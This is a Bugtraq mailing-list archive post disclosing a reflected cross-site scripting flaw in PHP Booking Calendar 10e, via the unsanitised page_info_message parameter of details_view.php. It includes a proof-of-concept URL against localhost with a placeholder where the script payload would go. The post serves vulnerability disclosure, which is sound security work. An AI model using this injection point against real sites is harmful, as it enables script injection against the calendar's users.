[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

PHP Booking Calendar 10e XSS

To: <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: PHP Booking Calendar 10e XSS
From: tom <tom@xxxxxxxxxx>
Date: Sun, 18 Dec 2011 15:15:36 -0500

# Exploit Title: PHP Booking Calendar 10e XSS
# Date: 12/16/11
# Author: G13
# Software Link: http://sourceforge.net/projects/bookingcalendar/
# Version: 10e
# Category: webapps (php)
#

##### Vulnerability #####

The page_info_message varibale in the details_view.php does notsanitize input. This is a relective XSS attack.


##### Exploit #####

http://127.0.0.1/cal/details_view.php?event_id=1&date=2011-12-01&view=month&loc=loc1&page_info_message=[XSS]

Prev by Date: [ MDVSA-2011:190 ] libarchive
Next by Date: IFIP NTMS'2012 - Deadline Extended to 12 January 2012
Previous by thread: [ MDVSA-2011:190 ] libarchive
Next by thread: IFIP NTMS'2012 - Deadline Extended to 12 January 2012
Index(es):
- Date
- Thread